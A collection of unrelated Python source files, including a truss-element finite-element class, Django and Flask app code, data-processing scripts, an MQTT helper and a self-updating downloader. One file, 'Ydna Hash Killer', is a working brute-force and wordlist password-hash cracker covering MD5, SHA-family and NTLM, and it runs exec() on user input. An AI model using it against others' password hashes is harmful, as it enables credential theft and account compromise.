elementLength      the length of the element, to be calculated
elementArea        A
elementEmodulus    E
elementStiffness   the k value of the element
elementInertia     I
elementAngle       angle of the element in the world frame
elementStress      will hold the calculated resulting stress
elementBuckleRisk  will hold the calculated risk of buckling
i.e. two node instances attached to it, an elementNr, an elementLength, an elementStiffness and an elementAngle.
Extra features could be added.
"""
# Imports
import numpy as np
# select the example to plot, This should be altered in your code
book_ex = False
if book_ex:
    # values matching the textbook worked example
    A = 8 #value from textbook example
    E = 1.9*10**6 #value from textbook example
    I = 1 #random variable
    Scale_Mpa = 1 #use 1 as the scale, no conversion to MPa
else:
    #default values to be used when creating an element
    plateThickness = 3*10**-3 #[m] plate thickness
    elementWidth = 7*10**-3 #[m] width of the element
    A = (plateThickness)*(elementWidth) #[m²] Surface area of cross section of the elements
    E = 3*10**9 #[Pa] E modulus of MDF
    I = ((elementWidth)*(plateThickness)**3)/12 #[m^4] Second moment of inertia, m4
    Scale_Mpa = 10**6 #can be used to convert plots to Mpa
class element:
    """A two-node truss element.

    Holds geometry (length, angle), section/material properties (A, E, I),
    the axial stiffness k = A*E/L, and — after setStress/setBuckleRisk —
    the resulting stress and buckling risk.
    """
    # elementNrs of every element ever created (class-wide); used to pick
    # the next free number and to check uniqueness
    list_of_elementNrs = []

    def __init__(self, elementNr, firstNode, secondNode):
        # elementNr == 0 with existing elements -> auto-assign the next free
        # number; otherwise store elementNr + 1.
        # NOTE(review): the +1 offset is kept from the original code — the
        # first element created as element(0, ...) gets number 1.
        if elementNr == 0 and len(self.list_of_elementNrs) != 0:
            self.elementNr = max(self.list_of_elementNrs) + 1
        else:
            self.elementNr = elementNr + 1
        self.firstNode = firstNode
        self.secondNode = secondNode
        # element length from the node coordinates
        self.elementLength = np.sqrt((firstNode.xPos - secondNode.xPos)**2 + (firstNode.yPos - secondNode.yPos)**2)
        self.elementArea = A
        self.elementEmodulus = E
        # axial stiffness k = A*E/L (pdf p150)
        self.elementStiffness = (self.elementArea*self.elementEmodulus) / self.elementLength
        self.elementInertia = I
        # orientation in the world frame; arctan2 yields the correct quadrant
        self.elementAngle = np.arctan2(secondNode.yPos - firstNode.yPos, secondNode.xPos - firstNode.xPos)
        self.stressScale = Scale_Mpa
        # results are unknown until setStress / setBuckleRisk run
        self.elementStress = np.nan
        self.elementBuckleRisk = np.nan
        # record the new elementNr in the class-wide registry
        element.list_of_elementNrs.append(self.elementNr)

    def print_details(self, details):
        """Print the element's numbering, node numbers and angle (degrees).

        With details=True the attached nodes also print their full details.
        """
        print(" elementNr = {}".format(self.elementNr))
        print(" firstNode = {}".format(self.firstNode.nodeNr))
        if details:
            self.firstNode.print_details()
        print(" secondNode = {}".format(self.secondNode.nodeNr))
        if details:
            self.secondNode.print_details()
        print(" elementAngle = {}".format(self.elementAngle/(np.pi)*180))

    def setEmodulus(self, value):
        """Change E and refresh the stiffness that depends on it."""
        self.elementEmodulus = value
        self.elementStiffness = (self.elementArea*self.elementEmodulus) / self.elementLength

    def setInertia(self, value):
        """Change the second moment of inertia I."""
        self.elementInertia = value

    def setStress(self, U):
        """Compute the axial stress from the global displacement matrix U.

        U is indexed by node number: rows 2*n and 2*n+1 hold node n's
        x and y displacements.
        """
        # step 1: select the relevant global displacements
        U_relevant = [U[2*(self.firstNode.nodeNr), 0],
                      U[(2*(self.firstNode.nodeNr))+1, 0],
                      U[(2*(self.secondNode.nodeNr)), 0],
                      U[(2*(self.secondNode.nodeNr))+1, 0]]
        # step 2: T^-1 matrix, world -> local displacements (pdf p162)
        T_inv = [[np.cos(self.elementAngle), np.sin(self.elementAngle), 0, 0],
                 [-np.sin(self.elementAngle), np.cos(self.elementAngle), 0, 0],
                 [0, 0, np.cos(self.elementAngle), np.sin(self.elementAngle)],
                 [0, 0, -np.sin(self.elementAngle), np.cos(self.elementAngle)]]
        # step 3: local displacements
        u = np.matmul(T_inv, U_relevant, out=None)
        # step 4: stress = E * (elongation / length) from the axial components
        self.elementStress = (self.elementEmodulus)*((u[0] - u[2])/(self.elementLength))

    def setBuckleRisk(self):
        """Set elementBuckleRisk = current force / Euler critical force * 100.

        Per this code's sign convention a positive stress means compression;
        elements in tension get risk 0. (The original assigned k = 1 twice;
        the dead outer assignment was removed.)
        """
        if self.elementStress > 0:
            k = 1  # effective-length coefficient of the Euler formula
            Fcrit = ((np.pi**2) * self.elementEmodulus * self.elementInertia)/(k * self.elementLength)**2
            Fcur = self.elementStress*self.elementArea
            # buckling risk is (current force)/(critical force)*100
            self.elementBuckleRisk = (Fcur)/(Fcrit)*100
        else:
            self.elementBuckleRisk = 0

    @classmethod
    def verify_unique_elementNr(cls):
        """Print whether every created elementNr is unique.

        Set-based check replaces the original O(n^2) pairwise scan; the
        printed output is unchanged.
        """
        boolean = len(cls.list_of_elementNrs) == len(set(cls.list_of_elementNrs))
        print("Is unique element? : ")
        print(boolean)
""" the following section helps you to debug the code:
You can test your functions by altering the code below
Do so for all the functions you create, investigate that everything behaves as expected
"""
def testfunctionElement():
    """ create some hardcoded values to test the code of this file"""
    class node:
        # minimal stand-in for the real node class — just enough for element
        def __init__(self,nodeNr,xPos,yPos,X_disp,Y_disp,Fx,Fy):
            self.nodeNr = nodeNr
            self.xPos = xPos
            self.yPos = yPos
            self.xDisp = X_disp # it is important to set to nan if no boundary condition
            self.yDisp = Y_disp # it is important to set to nan if no boundary condition
            self.Fx = Fx # it is important to set to nan if no boundary condition
            self.Fy = Fy # it is important to set to nan if no boundary condition
            # here you could do things when you create a new node
            # e.g. add the new nodeNr to the list_of_nodeNr you ever created
    n1=node(1,0,0,np.nan,np.nan,np.nan,np.nan) #node 1 of the textbook example
    n2=node(2,3*12,0,np.nan,np.nan,np.nan,np.nan) #node 2 of the textbook example (feet to inch = *12)
    n5=node(5,6*12,3*12,np.nan,np.nan,np.nan,np.nan) #node 5 of the textbook example (feet to inch = *12)
    #class nodeTable:
    #    def __init__(self,n1,n2):
    #        self.nodeTable = [n1,n2]
    #NT = nodeTable(n1,n2) #create a node table, could be used for testing additional functions
    #enter example of U: length(U) = 2*(highest_node_nr +1), values from the textbook example
    U = np.array([[0], [0], [0], [0],[-0.00355], [-0.01026], [0], [0], [0.0018], [-0.0114], [0.0024], [-0.0195]])
    """ we now have a nodeTable and nodes we can use for further testing of the code"""
    # exercise the element class end to end against the textbook numbers
    test_element=element(0,n2,n5)
    test_element.print_details(False) #printing with True will not work (why?)
    test_element.setStress(U)
    test_element.print_details(False) #the value of the stress should now be 86.81
    test_element.setBuckleRisk()
    test_element.print_details(False) #the value of the BucklerRisk should now be 9.6%
    test_element.verify_unique_elementNr() #test this section of the code
''' call the testfunction in case the file is being runned as "main file" '''
# Run the self-test only when executed directly, not on import.
if __name__ == '__main__':
    testfunctionElement()
|
from django.contrib import admin
from micameo.order.models import (Order, Occasion, Cameo)
# Register your models here.
@admin.register(Occasion)
class Occasion(admin.ModelAdmin):
    # NOTE(review): this admin class shadows the imported Occasion model
    # name after registration; consider renaming it to OccasionAdmin.
    list_display = ["occasion_name"]
    search_fields = ["occasion_name"]
@admin.register(Order)
class Order(admin.ModelAdmin):
    # NOTE(review): this admin class shadows the imported Order model name
    # after registration; consider renaming it to OrderAdmin.
    list_display = ["email_client", "order_state", "talent", "talent_response", "order_price", "created"]
    search_fields = ["email_client"]
@admin.register(Cameo)
class Cameo(admin.ModelAdmin):
    # NOTE(review): this admin class shadows the imported Cameo model name;
    # also, search_fields on a ForeignKey usually needs a related lookup
    # such as "order__email_client" — verify "order" works as intended.
    list_display = ["order", "url_video"]
    search_fields = ["order"]
|
import os
from datetime import datetime
from flask import Flask, Response, jsonify, request
from prometheus_flask_exporter import PrometheusMetrics
from prometheus_client import make_wsgi_app
from werkzeug.middleware.dispatcher import DispatcherMiddleware
from werkzeug.serving import run_simple
from books import bootstrap, views
from books.domain import commands
from books.service_layer.handlers import InvalidIsbn
app = Flask(__name__)
bus = bootstrap.bootstrap()
metrics = PrometheusMetrics(app)
metrics.info('app_info', 'books', version='1.0.0')
@app.route("/books/", methods=['GET'])
def book_list():
    """List books; repeated ?isbn= query params filter the result."""
    isbns = request.args.to_dict(flat=False).get('isbn')  # None -> all books
    result = views.books(isbns, bus.uow)
    if not result:
        return "not found", 404
    return jsonify(result), 200
@app.route("/books/<isbn>", methods=['GET'])
def get_book(isbn: str):
    """Fetch a single book by its ISBN; 404 when unknown."""
    result = views.books([isbn], bus.uow)
    if not result:
        return "not found", 404
    return jsonify(result), 200
@app.route("/books/", methods=["POST"])
def add_book():
    """Create a book from a JSON body: isbn, name, price, optional pub_date.

    Returns 201 on success, 400 when the ISBN is rejected by the handler.
    """
    pub_date = request.json.get("pub_date")
    if pub_date is not None:
        # ISO-8601 date string -> datetime.date
        pub_date = datetime.fromisoformat(pub_date).date()
    try:
        cmd = commands.AddBook(
            request.json["isbn"], request.json["name"], request.json["price"], pub_date
        )
        bus.handle(cmd)
    except InvalidIsbn as e:
        return {"message": str(e)}, 400
    return "OK", 201
if __name__ == "__main__":
    from .config import get_api_url
    host_port = get_api_url()
    print(host_port)
    # app.run(host_port.get("host"), host_port.get("port"), debug=True)
    # Plug metrics WSGI app to your main app with dispatcher, so Prometheus
    # scrapes are served at /metrics alongside the Flask app.
    dispatcher = DispatcherMiddleware(app.wsgi_app, {"/metrics": make_wsgi_app()})
    run_simple(hostname=host_port.get("host"), port=host_port.get("port"), application=dispatcher)
import json
import logging
from pathlib import Path
import firebase_admin.firestore
from google.api_core.exceptions import AlreadyExists, NotFound
from google.cloud.firestore_v1 import Client
from telegram import Message
from giru.config import settings
cert_file_path = Path(settings.FIREBASE_ACCOUNT_KEY_FILE_PATH).absolute()
SAVED_REPLIES_FILE_PATH = Path(settings.GIRU_DATA_PATH) / "replies.ndjson"
SCORES_FILE_PATH = Path(settings.GIRU_DATA_PATH) / "scores.json"
def process_message(db: Client, message: Message):
    """Persist a Telegram message (chat, message and author) into Firestore.

    Messages without text are skipped entirely.
    """
    if not message.text:
        return
    chat_doc = db.collection("chats").document(str(message.chat_id))
    chat_doc.set(message.chat.to_dict())
    chat_doc.collection("messages").document(str(message.message_id)).set(
        message.to_dict()
    )
    user = message.from_user
    try:
        # create() raises if the user document already exists
        db.collection("users").document(str(user.id)).create(user.to_dict())
    except AlreadyExists:
        logging.info("%s already existed", user.first_name)
def process_scores(db, first_name, score):
    """Store one user's score under a fixed chat document.

    NOTE(review): the chat id is hard-coded — confirm it should not come
    from configuration instead.
    """
    chat_doc = db.collection("chats").document("-1001254163442")
    try:
        # make sure the chat document exists before writing under it
        chat_doc.create({})
    except AlreadyExists:
        pass
    try:
        chat_doc.collection("scores").document(first_name).create(dict(score=score))
    except AlreadyExists:
        logging.warning("%s already had a score here", first_name)
def main():
    """Replay saved replies and scores from local files into Firestore."""
    firebase_admin.initialize_app(
        firebase_admin.credentials.Certificate(cert_file_path)
    )
    db: Client = firebase_admin.firestore.client()
    # one JSON-encoded Telegram message per line (ndjson)
    for line in SAVED_REPLIES_FILE_PATH.read_text().splitlines():
        message = Message.de_json(json.loads(line), None)
        process_message(db, message)
    # read_text + json.loads instead of json.load(path.open("r")), which
    # left the file handle open (resource leak)
    scores = json.loads(SCORES_FILE_PATH.read_text())
    for first_name, score in scores.items():
        process_scores(db, first_name, score)
if __name__ == "__main__":
    # configure root logging before touching Firestore
    logging.basicConfig()
    main()
|
from collections.abc import Iterable
def flatten(items, ignore_type=(str, bytes)):
    '''
    Recursively flatten a nested sequence.

    :param items: iterable to flatten
    :param ignore_type: type(s) treated as atomic even though iterable
    :return: yields the individual elements one by one
    '''
    # local import: collections.Iterable was removed in Python 3.10
    from collections.abc import Iterable
    for x in items:
        if isinstance(x, Iterable) and not isinstance(x, ignore_type):
            # bug fix: propagate ignore_type — the original recursed with
            # the default, silently discarding a caller-supplied value
            yield from flatten(x, ignore_type)
        else:
            yield x
|
from flask import request
from app.api.responses import Responses
parties = []  # in-memory store of saved party dicts

class PoliticalParty:
    """this initializes political party class methods"""
    def __init__(self, name, hqAddress, logoUrl):
        self.party_id = len(parties) + 1
        self.name = name
        self.hqAddress = hqAddress
        self.logoUrl = logoUrl

    @staticmethod
    def get_all_parties():
        """Return every saved party wrapped in the standard response."""
        return Responses.complete_response(parties)

    def add_political_party(self):
        """this saves political party data"""
        new_party = {
            # use the id computed at construction time instead of
            # recomputing len(parties) + 1 here — the two could disagree
            # if another party was saved in between
            "id": self.party_id,
            "name": self.name,
            "hqAddress": self.hqAddress,
            "logoUrl": self.logoUrl
        }
        parties.append(new_party)
class Update:
    @staticmethod
    def update_party_details(id):
        """Update the name of the party with the given id from the JSON
        request body; 404 when no such party exists."""
        task = [party for party in parties if party["id"] == id]
        if not task:
            return Responses.not_found("Party not found"), 404
        # keep the old name when the body does not provide one
        task[0]['name'] = request.json.get('name', task[0]['name'])
        return Responses.complete_response(task)
|
class Config(object):
    """Minimal config holder.

    NOTE(review): the original __init__ had no body at all (a syntax
    error); storing the path is the minimal plausible behavior — confirm
    against callers.
    """
    def __init__(self, path):
        self.path = path

    @property
    def pages(self):
        return self

class Page(object):
    """A named page belonging to a plugin, configured by *config*."""
    def __init__(self, plugin, name, config):
        self._name = name
        self._config = config
        self._plugin = plugin

    def widget(self):
        # NOTE(review): the original body was missing (syntax error); there
        # is no behavior to preserve, so fail loudly until implemented.
        raise NotImplementedError
|
from django.conf.urls import patterns, url
from fans.views import get_fans, fans_report, group_up
# NOTE(review): django.conf.urls.patterns() was removed in Django 1.10;
# this module can only run on old Django versions.
urlpatterns = patterns(".views",
    url('^get_fans/', get_fans),
    url('^report/', fans_report),
    url('^group_up/', group_up),
)
|
# i=input()
# print(f"hello {i}")
def square(x):
    """Return the square of x."""
    result = x * x
    return result
def mian():  # (sic) misspelled name kept so existing callers keep working
    """Print the squares of 0 through 9."""
    for value in range(10):
        print("{} squared is {}".format(value, square(value)))
# Bug fix: the guard compared against "__main()__", which __name__ can
# never equal, so the script silently did nothing when run directly.
if __name__ == "__main__":
    mian()
    print(square(10))
|
####################
# Ydna Hash Killer #
# V: 1.1.1 #
####################
import itertools
import hashlib
import os
import hashlib,binascii
composicao = True
tamanho = True
continuar = True
continuar2 = True
continuargeral = True
chrs = ""
criptografia = ""
codehash = ""
quadro = """
----------------------------
| blake2s | sha3_256 |
| sha512 | sha256 |
| sha3_512 | sha256 |
| sha224 | sha512 |
| sha384 | md5 |
| sha3_384 | blake2b |
| sha1 | ntlm |
----------------------------
"""
logo = """
_ _ _____ _ _ _ _______ _ _ ______ _____
| | | | /\ / ____| | | | | |/ /_ _| | | | | ____| __ \
| |__| | / \ | (___ | |__| | | ' / | | | | | | | |__ | |__) |
| __ | / /\ \ \___ \| __ | | < | | | | | | | __| | _ /
| | | |/ ____ \ ____) | | | | | . \ _| |_| |____| |____| |____| | \ \
|_| |_/_/ \_\_____/|_| |_| |_|\_\_____|______|______|______|_| \_\
Ydna Hash Killer
Programado por: Nico Perez
"""
intro = """
1 - Realizar ataque de força bruta
2 - Realizar ataque de wordlist
"""
wordlistquadro = """
"""
################################## THE ACTUAL CODE STARTS HERE ###############################
print(logo)
print(intro)
# main interactive loop (continuargeral is never set False -> runs until killed)
while continuargeral == True:
    menuprincipal = int(input("O que deseja fazer?"))
    if (menuprincipal == 1) or (menuprincipal == 2):
        # common setup: pick the hash algorithm and the target hash
        print(quadro)
        print("")
        menu2 = str(input ("Qual algorítmo de hash deseja testar? Escreva o nome como mostrado no quadro."))
        print("")
        hashcomp = str(input("Insira a hash."))
        print("")
        criptografia = menu2
        # build "hashcerto = hashlib.<alg>(senha6.encode())" for exec().
        # NOTE(review): exec() of a user-typed algorithm name is unsafe.
        codehash = "hashcerto = hashlib."
        codehash += criptografia
        codehash += "(senha6.encode())"
    if menuprincipal == 1:
        # brute-force attack: first compose the candidate character set
        print ("")
        print ("Componha sua amostragem utilizando os comandos abaixo:")
        print ("")
        print ("1 - Caracteres a-z")
        print ("2 - Caracteres A-Z")
        print ("3 - Caracteres 0-9")
        print ("4 - Caracteres especiais !@#$%&*() ")
        print ("")
        print ("5 - Zerar padrões")
        print ("6 - Prosseguir")
        print ("")
        while composicao == True:
            menu1 = int(input("O que deseja fazer?"))
            print("")
            if menu1 ==1:
                chrs += "abcdefghijklmnopqrstuvwxyz"
            if menu1==2:
                chrs += "ABCDEFGHIJLKMNOPQRSTUVWXYZ"
            if menu1==3:
                chrs += "0123456789"
            if menu1==4:
                chrs += "!@#$%&*()"
            if menu1==5:
                chrs = ""
            if menu1==6:
                composicao = False
        print("")
        minimo = int(input("Qual o mínimo de caracteres que deseja testar?"))
        print("")
        maximo = int(input("Qual o máximo de caracteres que deseja testar?"))
        print("")
        # try every combination of every requested length
        for n in range(minimo, maximo+1):
            for xs in itertools.product(chrs, repeat=n):
                if continuar == True:
                    if criptografia == "ntlm":
                        # NTLM = MD4 over the UTF-16LE password; hashlib has
                        # no named constructor, hence hashlib.new('md4', ...)
                        xs = str(xs)
                        xs = str(xs)
                        # strip the tuple repr down to the bare candidate
                        senha1 = (xs.replace("'", ""))
                        senha2 = (senha1.replace("(", ""))
                        senha3 = (senha2.replace(")", ""))
                        senha4 = (senha3.replace("'", ""))
                        senha5 = (senha4.replace(" ", ""))
                        senha6 = (senha5.replace(",", ""))
                        # NOTE(review): the hash is computed over the raw
                        # tuple repr `xs`, not the cleaned `senha6` — NTLM
                        # brute forcing likely never matches; confirm.
                        hash = hashlib.new('md4', xs.encode('utf-16le')).digest()
                        hashok = str((binascii.hexlify(hash)))
                        hashfinal = str(hashok.replace("'",""))
                        hashfinal = hashfinal[1:]
                        if hashfinal == hashcomp:
                            print ("")
                            print ("-------------------------------------------------------------")
                            print ("SUCESSO! A senha correspondente à hash é", senha6, "!")
                            wait = input("PRESSIONE ENTER PARA SAIR")
                            continuar = False
                        else:
                            print ("A senha", senha6, "não corresponde. Sua hash é: ", hashfinal)
                    else:
                        xs = str(xs)
                        # strip the tuple repr down to the bare candidate
                        senha1 = (xs.replace("'", ""))
                        senha2 = (senha1.replace("(", ""))
                        senha3 = (senha2.replace(")", ""))
                        senha4 = (senha3.replace("'", ""))
                        senha5 = (senha4.replace(" ", ""))
                        senha6 = (senha5.replace(",", ""))
                        # run the dynamically-built hashlib call; defines hashcerto
                        exec(codehash)
                        hex_dig = hashcerto.hexdigest()
                        if hex_dig == hashcomp:
                            print ("")
                            print ("-------------------------------------------------------------")
                            print ("SUCESSO! A senha correspondente à hash é", senha6, "!")
                            wait = input("PRESSIONE ENTER PARA SAIR")
                            continuar = False
                        else:
                            print ("A senha", senha6, "não corresponde. Sua hash é: ", hex_dig)
                else:
                    a=0
    if menuprincipal ==2 :
        # wordlist attack
        print (wordlistquadro)
        listauso = str(input("Escreva o nome da wordlist que deseja utilizar, exatamente como está no quadro. Caso possua uma wordlist personalizada em .txt, trasnfiara-a para o diretório do programa e insira seu nome, sem extensão."))
        listauso += ".txt"
        with open (listauso, "r") as myfile:
            data= str(myfile.readlines())
        # data is the str() of a list of lines -> split and clean each word
        novo = data.split()
        for elem in novo:
            palavra = (elem.replace("'", ""))
            # NOTE(review): drops the last 3 chars (repr leftovers such as
            # "\n',") — this may also truncate real password characters.
            palavra = palavra[:-3]
            if continuar2 == True:
                if criptografia == "ntlm":
                    palavra = str(palavra)
                    senha1 = (palavra.replace("'", ""))
                    senha2 = (senha1.replace("(", ""))
                    senha3 = (senha2.replace(")", ""))
                    senha4 = (senha3.replace("'", ""))
                    senha5 = (senha4.replace(" ", ""))
                    senha6 = (senha5.replace(",", ""))
                    # NTLM = MD4 over the UTF-16LE encoded word
                    hash = hashlib.new('md4', palavra.encode('utf-16le')).digest()
                    hashok = str((binascii.hexlify(hash)))
                    hashfinal = str(hashok.replace("'",""))
                    hashfinal = hashfinal[1:]
                    if hashfinal == hashcomp:
                        print ("")
                        print ("-------------------------------------------------------------")
                        print ("SUCESSO! A senha correspondente à hash é", senha6, "!")
                        print ("")
                        wait = input("PRESSIONE ENTER PARA SAIR")
                        continuar2 = False
                    else:
                        print ("A senha", senha6, "não corresponde. Sua hash é: ", hashfinal)
                else:
                    xs = str(palavra)
                    senha1 = (xs.replace("'", ""))
                    senha2 = (senha1.replace("(", ""))
                    senha3 = (senha2.replace(")", ""))
                    senha4 = (senha3.replace("'", ""))
                    senha5 = (senha4.replace(" ", ""))
                    senha6 = (senha5.replace(",", ""))
                    # run the dynamically-built hashlib call; defines hashcerto
                    exec(codehash)
                    hex_dig = hashcerto.hexdigest()
                    if hex_dig == hashcomp:
                        print ("")
                        print ("-------------------------------------------------------------")
                        print ("SUCESSO! A senha correspondente à hash é", senha6, "!")
                        print ("")
                        wait = input("PRESSIONE ENTER PARA SAIR")
                        continuar2 = False
                    else:
                        print ("A senha", senha6, "não corresponde. Sua hash é: ", hex_dig)
            else:
                a = 0
|
# this code is on the lowest level .Hadn't added any error handling. Need to improve this in future
# See this link and add other methods https://github.com/eclipse/paho.mqtt.python#single
import paho.mqtt.client as paho
import time
import paho.mqtt.publish as publish
def my_mqtt_publish(topic, payload):
    """Publish a single MQTT message to the public HiveMQ broker.

    Args:
        topic (str): MQTT topic to publish to.
        payload: Message payload, passed straight to paho's publish.single.

    Failures are logged and swallowed so a broker outage does not crash the
    caller (best-effort publish).
    """
    try:
        publish.single(topic, payload, hostname="broker.mqttdashboard.com")
        # BUG FIX: the original used Python-2 `print` statements, which are a
        # SyntaxError under Python 3.
        print("going to publish topic and i am in the other module")
        print("going to publish topic : {0} and payload {1}".format(topic, payload))
    except Exception as e:
        # BUG FIX: e.message only existed on Python 2 exceptions; str(e) is portable.
        print(e.args, str(e))
|
import pandas as pd
import numpy as np
import sketches
import matplotlib.pyplot as plt
import torch
from tqdm import tqdm
from pathlib import Path
import itertools
from multiprocessing import Pool
from functools import partial
import multiprocessing
def get_f_error(true, pred):
    """Frequency-weighted mean absolute error, normalised by total true mass."""
    weighted_abs_err = np.sum(true * np.abs(pred - true))
    return weighted_abs_err / np.sum(true)
def get_mse(true, pred):
    """Root of the total squared error normalised by total true mass."""
    sq_err = (pred - true) ** 2
    return np.sqrt(np.sum(sq_err) / np.sum(true))
def get_error(true_out, valid_out, test_out, mem_perc, nhashes, width, seed, sketch_type):
    """Estimate sketch error when the heaviest predicted items are stored exactly.

    A budget of ``nbuckets`` exact-count slots (derived from ``mem_perc`` percent
    of the item universe) is spent on items whose predicted frequency
    (``test_out``) clears a cutoff chosen from the validation predictions
    (``valid_out``); all remaining mass goes through a count / count-min sketch.

    Args:
        true_out: true frequency of every item (numpy array).
        valid_out: predictions on the validation data, used to pick the cutoff.
        test_out: predictions on the test data, used to select items to store.
        mem_perc: exact-storage budget as a percentage of the number of items.
        nhashes: number of hash rows in the sketch.
        width: number of counters per hash row.
        seed: seed forwarded to the sketch implementation.
        sketch_type: "cs" for count-sketch, "cm" for count-min.

    Returns:
        (space_in_bytes, weighted_abs_error, weighted_rmse, mass_left_in_sketch)
    """
    freqs = true_out.copy()
    #print(true_out.sum())
    nbuckets = int((mem_perc) * len(valid_out) / 100)
    # Oversize the candidate pool by 10% so the cutoff is deliberately low;
    # the final selection below is still capped at nbuckets items.
    phantom_buckets = int((mem_perc) * 1.1 * len(valid_out) / 100)
    assert nbuckets < len(valid_out)
    cutoff = np.partition(valid_out, -phantom_buckets)[-phantom_buckets] #deliberately underset the cutoff.
    test_out_mask = (test_out > cutoff)
    filtered_values = freqs.copy()
    filtered_values[~test_out_mask] = 0
    nsamples = min(np.sum(test_out_mask), nbuckets)
    if nsamples > 0:
        # Sample (true-frequency weighted) which above-cutoff items get an
        # exact bucket.
        samps = torch.multinomial(torch.Tensor(filtered_values), nsamples)
    memmed_values = true_out.copy()
    if nsamples > 0:
        # Items stored exactly are removed from the stream fed to the sketch.
        freqs[samps] = 0
    if sketch_type == "cs":
        preds = sketches.count_sketch_preds(nhashes, freqs, width, seed)
    elif sketch_type == "cm":
        preds = sketches.cm_sketch_preds(nhashes, freqs, width, seed)
    # NOTE(review): any other sketch_type leaves `preds` undefined and raises
    # NameError below — confirm callers only pass "cs"/"cm".
    if nsamples > 0:
        preds[samps] = memmed_values[samps]
    # 4 bytes per sketch counter + 8 bytes per exact bucket.
    space = 4 * width * nhashes + 8 * nbuckets
    return space, get_f_error(true_out, preds), get_mse(true_out, preds), np.sum(freqs)
def get_ideal_error(true_out, valid_out, test_out, mem_perc, nhashes, width, seed, sketch_type):
    """Like get_error, but the cutoff is picked on the *test* predictions
    themselves — an oracle-style variant of spending the exact-bucket budget.

    Returns:
        (space_in_bytes, weighted_abs_error, weighted_rmse, mass_left_in_sketch)
    """
    freqs = true_out.copy()
    nbuckets = int(mem_perc * len(test_out) / 100)
    cutoff = np.partition(test_out, -nbuckets)[-nbuckets]
    test_out_mask = (test_out > cutoff)
    filtered_values = freqs.copy()
    filtered_values[~test_out_mask] = 0
    # True-frequency-weighted sampling of which above-cutoff items get exact
    # buckets; unlike get_error, no nsamples > 0 guard is applied here.
    samps = torch.multinomial(torch.Tensor(filtered_values), min(np.sum(test_out_mask), nbuckets))
    memmed_values = true_out.copy()
    freqs[samps] = 0
    if sketch_type == "cs":
        preds = sketches.count_sketch_preds(nhashes, freqs, width, seed)
    elif sketch_type == "cm":
        preds = sketches.cm_sketch_preds(nhashes, freqs, width, seed)
    preds[samps] = memmed_values[samps]
    # 4 bytes per sketch counter + 8 bytes per exact bucket.
    space = 4 * width * nhashes + 8 * nbuckets
    return (space, get_f_error(true_out, preds), get_mse(true_out, preds), np.sum(freqs))
def process_error(path, path2, exp_path, formula, path3=None,):
    """Sweep sketch configurations for one dataset and save a results table.

    Loads model predictions (``path``: .npz with "valid_output"/"test_output")
    and ground-truth frequencies (``path2``: .npy dict with key 'y'), evaluates
    get_error / get_ideal_error over a grid of (memory %, hash count, width,
    seed, sketch type) combinations in a process pool, and writes the table to
    ``exp_path`` in feather format.

    Args:
        path: .npz file with the model's validation/test predictions.
        path2: .npy file holding the true frequencies under key 'y'.
        exp_path: output path for the feather results table.
        formula: "std" (validation-based cutoff) or "ideal" (oracle cutoff).
        path3: optional second predictions file; selects the *_2 variants.
            NOTE(review): get_error_2 / get_ideal_error_2 are not defined in
            this module — the path3 branch would raise NameError as written.
    """
    with torch.no_grad():
        f = np.load(path)
        true = np.load(path2, allow_pickle=True).item()
        true_out = true['y']
        valid_out = f["valid_output"].flatten()
        test_out = f["test_output"].flatten()
        # Tiny Gaussian noise — presumably to break ties in the np.partition
        # cutoffs; TODO confirm.
        test_out += 0.00001 * np.random.randn(*test_out.shape)
        if path3 is not None:
            f = np.load(path3)
            valid_out_2 = f["valid_output"].flatten()
            test_out_2 = f["test_output"].flatten()
            test_out_2 += 0.00001 * np.random.randn(*test_out_2.shape)
        # One entry per configuration; assembled into the DataFrame below.
        spaces = []
        f_errors = []
        sums = []
        widths = []
        nhashes_arr = []
        percs = []
        sketch_types = []
        rmses = []
        seeds = []
        # Grid: 100 seeds for single-hash sketches, 20 for multi-hash ones.
        tiny_1 = list(itertools.product(np.linspace(2.5, 20, 8), [1], [1000, 10000, 100000], np.arange(100), ["cm", "cs"]))
        tiny_2 = list(itertools.product(np.linspace(2.5, 20, 8), [2, 3, 4], [1000, 10000, 100000], np.arange(20), ["cm", "cs"]))
        qtiny = tiny_1 + tiny_2
        q = qtiny
        with Pool(12) as p:
            # Bind the data arrays once; the pool supplies the grid parameters.
            if path3 is None:
                if formula == "std":
                    pfunc = partial(get_error, true_out, valid_out, test_out)
                if formula == "ideal":
                    pfunc = partial(get_ideal_error, true_out, valid_out, test_out)
            if path3 is not None:
                if formula == "std":
                    pfunc = partial(get_error_2, true_out, valid_out, test_out, valid_out_2, test_out_2)
                if formula == "ideal":
                    pfunc = partial(get_ideal_error_2, true_out, valid_out, test_out, valid_out_2, test_out_2)
            res = p.starmap(pfunc, tqdm(q))
        for i in range(len(q)):
            ele = q[i]
            result = res[i]
            percs.append(ele[0])
            nhashes_arr.append(ele[1])
            widths.append(ele[2])
            seeds.append(ele[3])
            sketch_types.append(ele[4])
            spaces.append(result[0])
            f_errors.append(result[1])
            rmses.append(result[2])
            sums.append(result[3])
        df = pd.DataFrame({"space": spaces, "f_error": f_errors, "sum": sums,
                           "width": widths, "nhashes": nhashes_arr, "rmse": rmses, "seed": seeds,
                           "perc": percs, "sketch": sketch_types})
        df.to_feather(exp_path)
def main():
    """Run the error-processing sweep for every (formula, minute, method) combination."""
    formulas = ["std"]
    minutes = [59]
    methods = ["log_mse-HsuRNN-False-ckpts-forwards-more"]
    for formula, minute, method in itertools.product(formulas, minutes, methods):
        log_dir = f"tb_logs_modded/{method}/trial1/lightning_logs"
        path = f"{log_dir}/predictions{minute:02}_res.npz"
        path2 = f"equinix-chicago.dirA.20160121-13{minute:02}00.ports.npy"
        exp_path = f"{log_dir}/minute{minute:02}_{formula}_small_final_results.ftr"
        process_error(path, path2, exp_path, formula)
if __name__ == "__main__":
    main()
import os
import subprocess
import time
import urllib.request
from shutil import copyfile
def main():
    """Self-update helper: replace modlunky2.exe with the latest GitHub release.

    A .bak copy of the executable is made first so a failed download can be
    rolled back; on success the backup is removed and the tool is relaunched.
    """
    cwd = os.getcwd()
    exe_path = cwd + "/modlunky2.exe"
    backup_path = exe_path + ".bak"
    copyfile(exe_path, backup_path)  # Creates temp backup
    try:
        os.remove(exe_path)  # deletes current version
        print("Download latest release of Modlunky2..")
        # downloads latest release on github
        url = "https://github.com/spelunky-fyi/modlunky2/releases/latest/download/modlunky2.exe"
        urllib.request.urlretrieve(url, exe_path)
        print("Download Complete!")
        # deletes backup once download is complete
        os.remove(backup_path)
        # runs tool again and closes
        subprocess.call([exe_path])
        # Wait for 5 seconds to give tool time to reopen
        time.sleep(5)
    except OSError:
